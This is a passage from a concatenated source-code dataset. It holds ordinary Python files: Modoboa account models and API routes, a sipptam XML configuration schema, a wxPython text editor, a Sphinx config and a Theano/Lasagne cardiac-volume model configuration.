self.set_password(row[2].strip())
else:
self.password = row[2].strip()
self.first_name = row[3].strip()
self.last_name = row[4].strip()
self.is_active = (row[5].strip().lower() in ["true", "1", "yes", "y"])
self.language = settings.LANGUAGE_CODE
self.save()
self.role = desired_role
self.post_create(user)
if len(row) < 8:
return
signals.account_imported.send(
sender=self.__class__, user=user, account=self, row=row[7:])
def to_csv(self, csvwriter):
"""Export this account.
The CSV format is used to export.
:param csvwriter: csv object
"""
row = [
"account",
smart_text(self.username),
smart_text(self.password),
smart_text(self.first_name),
smart_text(self.last_name),
smart_text(self.is_active),
smart_text(self.role),
smart_text(self.email)
]
results = signals.account_exported.send(
sender=self.__class__, user=self)
for result in results:
row += result[1]
csvwriter.writerow(row)
reversion.register(User)
def populate_callback(user, group="SimpleUsers"):
"""Populate callback
If the LDAP authentication backend is in use, this callback will
be called each time a new user authenticates succesfuly to
Modoboa. This function is in charge of creating the mailbox
associated to the provided ``User`` object.
:param user: a ``User`` instance
"""
from modoboa.lib.permissions import grant_access_to_object
sadmins = User.objects.filter(is_superuser=True)
user.role = group
user.post_create(sadmins[0])
for su in sadmins[1:]:
grant_access_to_object(su, user)
signals.account_auto_created.send(
sender="populate_callback", user=user)
class ObjectAccess(models.Model):
user = models.ForeignKey(User, on_delete=models.CASCADE)
content_type = models.ForeignKey(ContentType, on_delete=models.CASCADE)
object_id = models.PositiveIntegerField()
content_object = GenericForeignKey("content_type", "object_id")
is_owner = models.BooleanField(default=False)
class Meta(object):
unique_together = (("user", "content_type", "object_id"),)
def __str__(self):
return "%s => %s (%s)" % (
self.user, self.content_object, self.content_type
)
class Log(models.Model):
"""Simple log in database."""
date_created = models.DateTimeField(auto_now_add=True)
message = models.TextField()
level = models.CharField(max_length=15)
logger = models.CharField(max_length=30)
class LocalConfig(models.Model):
"""Store instance configuration here."""
api_pk = models.PositiveIntegerField(null=True)
site = models.ForeignKey("sites.Site", on_delete=models.CASCADE)
# API results cache
api_versions = jsonfield.JSONField()
_parameters = jsonfield.JSONField(default={})
# Dovecot LDAP update
need_dovecot_update = models.BooleanField(default=False)
def __init__(self, *args, **kwargs):
"""Load parameter manager."""
super(LocalConfig, self).__init__(*args, **kwargs)
self.parameters = param_tools.Manager("global", self._parameters)
class ExtensionUpdateHistory(models.Model):
"""Keeps track of update notifications."""
extension = models.CharField(max_length=100)
version = models.CharField(max_length=30)
class Meta:
unique_together = [("extension", "version")]
def __str__(self):
return "{}: {}".format(self.extension, self.name)
|
modoboa/modoboa
|
modoboa/core/models.py
|
Python
|
isc
| 15,574
|
"""Admin API urls."""
from rest_framework import routers
from . import viewsets
router = routers.SimpleRouter()
router.register(r"domains", viewsets.DomainViewSet, basename="domain")
router.register(
r"domainaliases", viewsets.DomainAliasViewSet, basename="domain_alias")
router.register(r"accounts", viewsets.AccountViewSet, basename="account")
router.register(r"aliases", viewsets.AliasViewSet, basename="alias")
router.register(
r"senderaddresses", viewsets.SenderAddressViewSet, basename="sender_address")
urlpatterns = router.urls
|
modoboa/modoboa
|
modoboa/admin/api/v1/urls.py
|
Python
|
isc
| 548
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
"""
sipptam.conf.Schema
~~~~~~~~~~~~~~~~~~~
Contains a basic XML schema to parse the input configuration file.
:copyright: (c) 2013 by luismartingil.
:license: See LICENSE_FILE.
"""
import StringIO
schema = StringIO.StringIO('''\
<?xml version="1.0" encoding="UTF-8"?>
<xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema" elementFormDefault="qualified">
<xs:element name="sipptam">
<xs:complexType>
<xs:sequence>
<xs:element name="tas" type="tasType" minOccurs="1" maxOccurs="unbounded"/>
<xs:element name="testrun" type="testrunType" minOccurs="1" maxOccurs="unbounded"/>
<xs:element name="config" type="configType" minOccurs="1" maxOccurs="unbounded"/>
<xs:element name="mod" type="modType" minOccurs="0" maxOccurs="unbounded"/>
<xs:element name="advanced" type="advancedType" minOccurs="1" maxOccurs="1"/>
</xs:sequence>
<xs:attribute name="duthost" type="xs:string" use="required"/>
<xs:attribute name="dutport" type="xs:positiveInteger" use="required"/>
</xs:complexType>
</xs:element>
<xs:complexType name="tasType">
<xs:attribute name="host" type="IPType" use="required"/>
<xs:attribute name="port" type="xs:string" use="required"/>
<xs:attribute name="jobs" type="xs:positiveInteger" use="required"/>
</xs:complexType>
<xs:complexType name="testrunType">
<xs:attribute name="id" type="xs:string" use="required"/>
<xs:attribute name="scenarioPath" type="xs:string" use="required"/>
<xs:attribute name="configlink" type="xs:string" use="required"/>
<xs:attribute name="modlink" type="xs:string"/>
</xs:complexType>
<xs:complexType name="configType">
<xs:attribute name="id" type="xs:string" use="required"/>
<xs:attribute name="ratio" type="numberListType" use="required"/>
<xs:attribute name="max" type="numberListType" use="required"/>
<xs:attribute name="pause" type="positiveFloat" use="required"/>
<xs:attribute name="tries" type="xs:positiveInteger" use="required"/>
</xs:complexType>
<xs:complexType name="modType">
<xs:sequence>
<xs:element name="replace" type="replaceType" minOccurs="0" maxOccurs="unbounded"/>
<xs:element name="injection" type="injectionType" minOccurs="0" maxOccurs="unbounded"/>
</xs:sequence>
<xs:attribute name="id" type="xs:string" use="required"/>
</xs:complexType>
<xs:complexType name="replaceType">
<xs:attribute name="regex" type="xs:string" use="required"/>
<xs:attribute name="src" type="xs:string" use="required"/>
<xs:attribute name="dst" type="xs:string" use="required"/>
</xs:complexType>
<xs:complexType name="injectionType">
<xs:attribute name="regex" type="xs:string" use="required"/>
<xs:attribute name="path" type="xs:string" use="required"/>
</xs:complexType>
<xs:complexType name="advancedType">
<xs:attribute name="execMode" type="execModeType" use="required"/>
<xs:attribute name="scenarioValidate" type="myBoolType" use="required"/>
<xs:attribute name="regexValidate" type="myBoolType" use="required"/>
</xs:complexType>
<xs:simpleType name="numberListType">
<xs:restriction base="xs:string">
<xs:pattern value="([0-9]*)((;[0-9]+)*)?"/>
</xs:restriction>
</xs:simpleType>
<xs:simpleType name="execModeType">
<xs:restriction base="xs:string">
<xs:enumeration value="serial"/>
<xs:enumeration value="parallel"/>
</xs:restriction>
</xs:simpleType>
<xs:simpleType name="IPType">
<xs:restriction base="xs:string">
<xs:pattern value="(([1-9]?[0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\.){3}([1-9]?[0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])"/>
</xs:restriction>
</xs:simpleType>
<xs:simpleType name="anyOrIPType">
<xs:restriction base="xs:string">
<xs:pattern value="((([1-9]?[0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\.){3}([1-9]?[0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5]))|(\*)"/>
</xs:restriction>
</xs:simpleType>
<xs:simpleType name="positiveFloat">
<xs:restriction base="xs:float">
<xs:minInclusive value="0.0"/>
</xs:restriction>
</xs:simpleType>
<xs:simpleType name="myBoolType">
<xs:restriction base="xs:string">
<xs:enumeration value="True"/>
<xs:enumeration value="False"/>
</xs:restriction>
</xs:simpleType>
</xs:schema>
''')
|
halitalptekin/sipptam
|
src/sipptam/validate/Schema.py
|
Python
|
isc
| 4,705
|
import wx
import os.path
class MainWindow( wx.Frame ):
def __init__( self, filename = '*.txt' ):
super( MainWindow, self ).__init__( None, size = ( 800,640 ) )
self.filename = filename
self.dirname = '.'
self.panel = wx.Panel( self, -1 )
self.CreateInteriorWindowComponents()
sizer = wx.BoxSizer()
sizer.Add( self.multiText, proportion = 1, flag = wx.CENTER|wx.EXPAND )
self.panel.SetSizer( sizer )
self.CreateExteriorWindowComponents()
self.multiText.Bind( wx.EVT_KEY_UP, self.updateLineCol )
self.multiText.Bind( wx.EVT_LEFT_DOWN, self.updateLineCol )
def CreateInteriorWindowComponents( self ):
self.multiText = wx.TextCtrl( self.panel, style = wx.TE_MULTILINE )
def updateLineCol( self, event ):
l,c = self.multiText.PositionToXY( self.multiText.GetInsertionPoint() )
stat = "col=%s, row=%s" % ( l,c )
self.StatusBar.SetStatusText( stat, number = 0 )
event.Skip()
def CreateExteriorWindowComponents( self ):
self.CreateMenu()
self.CreateStatusBar()
self.SetTitle()
def CreateMenu( self ):
fileMenu = wx.Menu()
for id, label, helpText, handler in \
[( wx.ID_OPEN, '&Open', 'Open a new file', self.OnOpen ),
( wx.ID_SAVE, '&Save', 'Save the current file', self.OnSave ),
( wx.ID_SAVEAS, 'Save &As', 'Save the file under a different name',
self.OnSaveAs ),
( None, None, None, None ),
( wx.ID_EXIT, 'E&xit', 'Terminate the program', self.OnExit )]:
if id == None:
fileMenu.AppendSeparator()
else:
item = fileMenu.Append( id, label, helpText )
self.Bind( wx.EVT_MENU, handler, item )
editMenu = wx.Menu()
for id, label, helpText, handler in \
[( wx.ID_COPY, '&Copy', 'Copy selected text', self.OnCopy ),
( wx.ID_PASTE, '&Paste', 'Paste clipboard text', self.OnPaste )]:
if id == None:
editMenu.AppendSeparator()
else:
item = editMenu.Append( id, label, helpText )
self.Bind( wx.EVT_MENU, handler, item )
aboutMenu = wx.Menu()
for id, label, helpText, handler in \
[( wx.ID_ABOUT, '&About', 'Information about this program',
self.OnAbout )]:
if id == None:
aboutMenu.AppendSeparator()
else:
item = aboutMenu.Append( id, label, helpText )
self.Bind( wx.EVT_MENU, handler, item )
menuBar = wx.MenuBar()
menuBar.Append( fileMenu, '&File' ) # Add the fileMenu to the MenuBar
menuBar.Append( editMenu, '&Edit' )
menuBar.Append( aboutMenu, '&About' )
self.SetMenuBar( menuBar ) # Add the menuBar to the Frame
def SetTitle( self ):
super( MainWindow, self ).SetTitle( 'ATE %s'%self.filename )
# helper methods
def defaultFileDialogOptions( self ):
return dict( message = 'Choose a file', defaultDir = self.dirname,
wildcard = '*.*' )
def askUserForFilename (self, **dialogOptions ):
dialog = wx.FileDialog( self, **dialogOptions )
if dialog.ShowModal() == wx.ID_OK:
userProvidedFilename = True
self.filename = dialog.GetFilename()
self.dirname = dialog.GetDirectory()
self.SetTitle()
else:
userProvidedFilename = False
dialog.Destroy()
return userProvidedFilename
# event handlers
def OnAbout( self, event ):
dialog = wx.MessageDialog( self, 'A sample editor\n'
'in wxPython', 'About Sample Editor', wx.OK )
dialog.ShowModal()
dialog.Destroy()
def OnExit( self, event ):
self.Close()
def OnSave( self, event ):
if os.path.exists( self.filename ):
self.OnSaveFile( event )
else:
self.OnSaveAs( event )
def OnOpen( self, event ):
if self.askUserForFilename( style = wx.OPEN, **self.defaultFileDialogOptions() ):
textfile = open( os.path.join( self.dirname, self.filename ), 'r' )
self.multiText.SetValue( textfile.read() )
textfile.close()
def OnSaveFile( self, event ):
textfile = open( os.path.join( self.dirname, self.filename ), 'w' )
textfile.write( self.multiText.GetValue() )
textfile.close()
def OnSaveAs( self, event ):
if self.askUserForFilename( defaultFile = self.filename, style = wx.SAVE,
**self.defaultFileDialogOptions() ):
self.OnSaveFile( event )
# clipboard functions, flush for other programs
def OnCopy( self, event ):
self.dataObj = wx.TextDataObject()
self.dataObj.SetText( self.multiText.GetStringSelection() )
if wx.TheClipboard.Open():
wx.TheClipboard.SetData( self.dataObj )
wx.TheClipboard.Flush()
else:
wx.MessageBox( "Unable to open the clipboard", "Error" )
def OnPaste( self, event ):
if wx.TheClipboard.Open():
dataObj = wx.TextDataObject()
success = wx.TheClipboard.GetData( dataObj )
wx.TheClipboard.Flush()
wx.TheClipboard.Close()
if not success: return
text = dataObj.GetText()
if text: self.multiText.WriteText( text )
app = wx.App()
frame = MainWindow()
frame.Show()
app.MainLoop()
|
mpjoseca/ate
|
src/editor.py
|
Python
|
isc
| 5,579
|
# -*- coding: utf-8 -*-
#
# sanpera documentation build configuration file, created by
# sphinx-quickstart2 on Sat May 12 21:24:07 2012.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys, os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.viewcode']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'sanpera'
copyright = u'2012, Eevee'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.1.0'
# The full version, including alpha/beta/rc tags.
release = '0.1.0'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'sanperadoc'
# -- Options for LaTeX output --------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'sanpera.tex', u'sanpera Documentation',
u'Eevee', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'sanpera', u'sanpera Documentation',
[u'Eevee'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output ------------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'sanpera', u'sanpera Documentation',
u'Eevee', 'sanpera', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
|
eevee/sanpera
|
doc/conf.py
|
Python
|
isc
| 7,742
|
from django.urls import reverse_lazy
from modoboa.lib.tests import ModoTestCase
class OpenAPITestCase(ModoTestCase):
openapi_schema_url = reverse_lazy('schema-v1-legacy')
def test_unauthorized(self):
self.client.logout()
response = self.client.get(self.openapi_schema_url)
self.assertEqual(response.status_code, 401)
def test_get_schema(self):
self.assertEqual(self.openapi_schema_url, "/docs/openapi.json")
response = self.client.get(self.openapi_schema_url)
self.assertEqual(response.status_code, 200)
self.assertEqual(response.json()['info'], {
'title': "Modoboa API",
'version': "v1",
})
|
modoboa/modoboa
|
modoboa/core/api/v1/tests.py
|
Python
|
isc
| 699
|
"""Single slice vgg with normalised scale.
"""
import functools
import lasagne as nn
import numpy as np
import theano
import theano.tensor as T
import data_loader
import deep_learning_layers
import image_transform
import layers
import preprocess
import postprocess
import objectives
import theano_printer
import updates
import utils
# Random params
rng = np.random
take_a_dump = False # dump a lot of data in a pkl-dump file. (for debugging)
dump_network_loaded_data = False # dump the outputs from the dataloader (for debugging)
# Memory usage scheme
caching = None
# Save and validation frequency
validate_every = 50
validate_train_set = True
save_every = 20
restart_from_save = False
dump_network_loaded_data = False
# Training (schedule) parameters
# - batch sizes
batch_size = 8
sunny_batch_size = 4
batches_per_chunk = 8
num_epochs_train = 250
# - learning rate and method
base_lr = 0.0003
learning_rate_schedule = {
0: base_lr,
9*num_epochs_train/10: base_lr/10,
19*num_epochs_train/20: base_lr/100,
}
momentum = 0.9
build_updates = updates.build_adam_updates
# Preprocessing stuff
cleaning_processes = [
preprocess.set_upside_up,]
cleaning_processes_post = [
functools.partial(preprocess.normalize_contrast_zmuv, z=2)]
augmentation_params = {
"rotation": (-360, 360),
"shear": (0, 0),
"translation": (-8, 8),
"flip_vert": (0, 1),
"roll_time": (0, 0),
"flip_time": (0, 0),
}
patch_mm = 64
use_hough_roi = True
preprocess_train = functools.partial( # normscale_resize_and_augment has a bug
preprocess.preprocess_normscale,
normscale_resize_and_augment_function=functools.partial(
image_transform.normscale_resize_and_augment_2,
normalised_patch_size=(patch_mm, patch_mm)))
preprocess_validation = functools.partial(preprocess_train, augment=False)
preprocess_test = preprocess_train
sunny_preprocess_train = preprocess.sunny_preprocess_with_augmentation
sunny_preprocess_validation = preprocess.sunny_preprocess_validation
sunny_preprocess_test = preprocess.sunny_preprocess_validation
# Data generators
create_train_gen = data_loader.generate_train_batch
create_eval_valid_gen = functools.partial(data_loader.generate_validation_batch, set="validation")
create_eval_train_gen = functools.partial(data_loader.generate_validation_batch, set="train")
create_test_gen = functools.partial(data_loader.generate_test_batch, set=["validation", "test"])
def filter_samples(folders):
# don't use patients who don't have more than 6 slices
return [
folder for folder in folders
if data_loader.compute_nr_slices(folder) > 6]
# Input sizes
patch_px = 32
nr_slices = 22
data_sizes = {
"sliced:data:sax": (batch_size, nr_slices, 30, patch_px, patch_px),
"sliced:data:sax:locations": (batch_size, nr_slices),
"sliced:data:sax:is_not_padded": (batch_size, nr_slices),
"sliced:data:randomslices": (batch_size, nr_slices, 30, patch_px, patch_px),
"sliced:data:singleslice:difference:middle": (batch_size, 29, patch_px, patch_px),
"sliced:data:singleslice:difference": (batch_size, 29, patch_px, patch_px),
"sliced:data:singleslice": (batch_size, 30, patch_px, patch_px),
"sliced:data:ax": (batch_size, 30, 15, patch_px, patch_px),
"sliced:data:shape": (batch_size, 2,),
"sunny": (sunny_batch_size, 1, patch_px, patch_px)
# TBC with the metadata
}
# Objective
l2_weight = 0.000
l2_weight_out = 0.000
def build_objective(interface_layers):
# l2 regu on certain layers
l2_penalty = nn.regularization.regularize_layer_params_weighted(
interface_layers["regularizable"], nn.regularization.l2)
# build objective
return objectives.KaggleObjective(interface_layers["outputs"], penalty=l2_penalty)
# Testing
postprocess = postprocess.postprocess
test_time_augmentations = 100 # More augmentations since a we only use single slices
tta_average_method = lambda x: np.cumsum(utils.norm_geometric_average(utils.cdf_to_pdf(x)))
# nonlinearity putting a lower bound on it's output
def lb_softplus(lb):
return lambda x: nn.nonlinearities.softplus(x) + lb
init = nn.init.Orthogonal()
rnn_layer = functools.partial(nn.layers.RecurrentLayer,
W_in_to_hid=init,
W_hid_to_hid=init,
b=nn.init.Constant(0.1),
nonlinearity=nn.nonlinearities.rectify,
hid_init=nn.init.Constant(0.),
backwards=False,
learn_init=True,
gradient_steps=-1,
grad_clipping=False,
unroll_scan=False,
precompute_input=False)
# Architecture
def build_model():
#################
# Regular model #
#################
input_size = data_sizes["sliced:data:sax"]
input_size_mask = data_sizes["sliced:data:sax:is_not_padded"]
input_size_locations = data_sizes["sliced:data:sax:locations"]
l0 = nn.layers.InputLayer(input_size)
lin_slice_mask = nn.layers.InputLayer(input_size_mask)
lin_slice_locations = nn.layers.InputLayer(input_size_locations)
# PREPROCESS SLICES SEPERATELY
l0_slices = nn.layers.ReshapeLayer(l0, (batch_size * nr_slices, 30, patch_px, patch_px)) # (bxs, t, i, j)
subsample_factor = 2
l0_slices_subsampled = nn.layers.SliceLayer(l0_slices, axis=1, indices=slice(0, 30, subsample_factor))
nr_frames_subsampled = 30 / subsample_factor
# PREPROCESS FRAMES SEPERATELY
l0_frames = nn.layers.ReshapeLayer(l0_slices_subsampled, (batch_size * nr_slices * nr_frames_subsampled, 1, patch_px, patch_px)) # (bxsxt, 1, i, j)
# downsample
downsample = lambda incoming: nn.layers.dnn.Pool2DDNNLayer(incoming, pool_size=(2,2), stride=(2,2), mode='average_inc_pad')
upsample = lambda incoming: nn.layers.Upscale2DLayer(incoming, scale_factor=2)
l0_frames_d0 = l0_frames
l0_frames_d1 = downsample(l0_frames_d0)
l0_frames_d2 = downsample(l0_frames_d1)
l0_frames_d3 = downsample(l0_frames_d2)
ld3a = nn.layers.dnn.Conv2DDNNLayer(l0_frames_d3, W=nn.init.Orthogonal("relu"), filter_size=(3,3), num_filters=16, stride=(1,1), pad="same", nonlinearity=nn.nonlinearities.rectify)
ld3b = nn.layers.dnn.Conv2DDNNLayer(ld3a, W=nn.init.Orthogonal("relu"), filter_size=(3,3), num_filters=16, stride=(1,1), pad="same", nonlinearity=nn.nonlinearities.rectify)
ld3c = nn.layers.dnn.Conv2DDNNLayer(ld3b, W=nn.init.Orthogonal("relu"), filter_size=(3,3), num_filters=16, stride=(1,1), pad="same", nonlinearity=nn.nonlinearities.rectify)
ld3o = nn.layers.dnn.Conv2DDNNLayer(ld3c, W=nn.init.Orthogonal("relu"), filter_size=(3,3), num_filters=16, stride=(1,1), pad="same", nonlinearity=nn.nonlinearities.rectify)
ld2i = nn.layers.ConcatLayer([l0_frames_d2, upsample(ld3o)], axis=1)
ld2a = nn.layers.dnn.Conv2DDNNLayer(ld2i, W=nn.init.Orthogonal("relu"), filter_size=(5,5), num_filters=32, stride=(1,1), pad="same", nonlinearity=nn.nonlinearities.rectify)
ld2b = nn.layers.dnn.Conv2DDNNLayer(ld2a, W=nn.init.Orthogonal("relu"), filter_size=(5,5), num_filters=32, stride=(1,1), pad="same", nonlinearity=nn.nonlinearities.rectify)
ld2c = nn.layers.dnn.Conv2DDNNLayer(ld2b, W=nn.init.Orthogonal("relu"), filter_size=(5,5), num_filters=32, stride=(1,1), pad="same", nonlinearity=nn.nonlinearities.rectify)
ld2d = nn.layers.dnn.Conv2DDNNLayer(ld2c, W=nn.init.Orthogonal("relu"), filter_size=(5,5), num_filters=32, stride=(1,1), pad="same", nonlinearity=nn.nonlinearities.rectify)
ld2o = nn.layers.dnn.Conv2DDNNLayer(ld2d, W=nn.init.Orthogonal("relu"), filter_size=(5,5), num_filters=32, stride=(1,1), pad="same", nonlinearity=nn.nonlinearities.rectify)
ld1i = nn.layers.ConcatLayer([l0_frames_d1, upsample(ld2o)], axis=1)
ld1a = nn.layers.dnn.Conv2DDNNLayer(ld1i, W=nn.init.Orthogonal("relu"), filter_size=(5,5), num_filters=32, stride=(1,1), pad="same", nonlinearity=nn.nonlinearities.rectify)
ld1b = nn.layers.dnn.Conv2DDNNLayer(ld1a, W=nn.init.Orthogonal("relu"), filter_size=(5,5), num_filters=32, stride=(1,1), pad="same", nonlinearity=nn.nonlinearities.rectify)
ld1c = nn.layers.dnn.Conv2DDNNLayer(ld1b, W=nn.init.Orthogonal("relu"), filter_size=(5,5), num_filters=32, stride=(1,1), pad="same", nonlinearity=nn.nonlinearities.rectify)
ld1d = nn.layers.dnn.Conv2DDNNLayer(ld1c, W=nn.init.Orthogonal("relu"), filter_size=(5,5), num_filters=32, stride=(1,1), pad="same", nonlinearity=nn.nonlinearities.rectify)
ld1o = nn.layers.dnn.Conv2DDNNLayer(ld1d, W=nn.init.Orthogonal("relu"), filter_size=(5,5), num_filters=32, stride=(1,1), pad="same", nonlinearity=nn.nonlinearities.rectify)
dropout = lambda incoming: nn.layers.DropoutLayer(incoming, p=0.5)
ld0i = nn.layers.ConcatLayer([l0_frames_d0, upsample(ld1o)], axis=1)
ld0a = nn.layers.dnn.Conv2DDNNLayer(dropout(ld0i), W=nn.init.Orthogonal("relu"), filter_size=(5,5), num_filters=32, stride=(1,1), pad="same", nonlinearity=nn.nonlinearities.rectify)
ld0b = nn.layers.dnn.Conv2DDNNLayer(dropout(ld0a), W=nn.init.Orthogonal("relu"), filter_size=(5,5), num_filters=32, stride=(1,1), pad="same", nonlinearity=nn.nonlinearities.rectify)
ld0c = nn.layers.dnn.Conv2DDNNLayer(dropout(ld0b), W=nn.init.Orthogonal("relu"), filter_size=(5,5), num_filters=32, stride=(1,1), pad="same", nonlinearity=nn.nonlinearities.rectify)
ld0d = nn.layers.dnn.Conv2DDNNLayer(dropout(ld0c), W=nn.init.Orthogonal("relu"), filter_size=(5,5), num_filters=32, stride=(1,1), pad="same", nonlinearity=nn.nonlinearities.rectify)
ld0o = nn.layers.dnn.Conv2DDNNLayer(dropout(ld0d), W=nn.init.Orthogonal("relu"), filter_size=(5,5), num_filters=1, stride=(1,1), pad="same", nonlinearity=nn.nonlinearities.sigmoid)
ld0r = nn.layers.ReshapeLayer(ld0o, (batch_size * nr_slices * nr_frames_subsampled, patch_px, patch_px))
l_frames_musigma = layers.IntegrateAreaLayer(ld0r, sigma_mode='smart', sigma_scale=.1)
area_per_pixel_cm = (float(patch_mm) / float(patch_px))**2 / 100.0
l_frames_musigma_cm = layers.TrainableScaleLayer(l_frames_musigma, scale=nn.init.Constant(area_per_pixel_cm), trainable=False)
# Go back to a per slice model
l_slices_musigma_cm = nn.layers.ReshapeLayer(l_frames_musigma_cm, (batch_size * nr_slices, nr_frames_subsampled, 2)) # (bxs, t, 2)
l_slices_musigma_cm_sys = layers.ArgmaxAndMaxLayer(l_slices_musigma_cm, mode='min') # (bxs, 2)
l_slices_musigma_cm_dia = layers.ArgmaxAndMaxLayer(l_slices_musigma_cm, mode='max') # (bxs, 2)
l_slices_musigma_cm_avg = layers.ArgmaxAndMaxLayer(l_slices_musigma_cm, mode='mean')
# AGGREGATE SLICES PER PATIENT
l_scaled_slice_locations = layers.TrainableScaleLayer(lin_slice_locations, scale=nn.init.Constant(0.1), trainable=False)
# Systole
l_pat_sys_ss_musigma_cm = nn.layers.ReshapeLayer(l_slices_musigma_cm_sys, (batch_size, nr_slices, 2))
l_pat_sys_ss_mu_cm = nn.layers.SliceLayer(l_pat_sys_ss_musigma_cm, indices=0, axis=-1)
l_pat_sys_ss_sigma_cm = nn.layers.SliceLayer(l_pat_sys_ss_musigma_cm, indices=1, axis=-1)
l_pat_sys_aggr_mu_sigma = layers.JeroenLayer([l_pat_sys_ss_mu_cm, l_pat_sys_ss_sigma_cm, lin_slice_mask, l_scaled_slice_locations], rescale_input=1.)
l_systole = layers.MuSigmaErfLayer(l_pat_sys_aggr_mu_sigma)
# Diastole
l_pat_dia_ss_musigma_cm = nn.layers.ReshapeLayer(l_slices_musigma_cm_dia, (batch_size, nr_slices, 2))
l_pat_dia_ss_mu_cm = nn.layers.SliceLayer(l_pat_dia_ss_musigma_cm, indices=0, axis=-1)
l_pat_dia_ss_sigma_cm = nn.layers.SliceLayer(l_pat_dia_ss_musigma_cm, indices=1, axis=-1)
l_pat_dia_aggr_mu_sigma = layers.JeroenLayer([l_pat_dia_ss_mu_cm, l_pat_dia_ss_sigma_cm, lin_slice_mask, l_scaled_slice_locations], rescale_input=1.)
l_diastole = layers.MuSigmaErfLayer(l_pat_dia_aggr_mu_sigma)
# Average
l_pat_avg_ss_musigma_cm = nn.layers.ReshapeLayer(l_slices_musigma_cm_avg, (batch_size, nr_slices, 2))
l_pat_avg_ss_mu_cm = nn.layers.SliceLayer(l_pat_avg_ss_musigma_cm, indices=0, axis=-1)
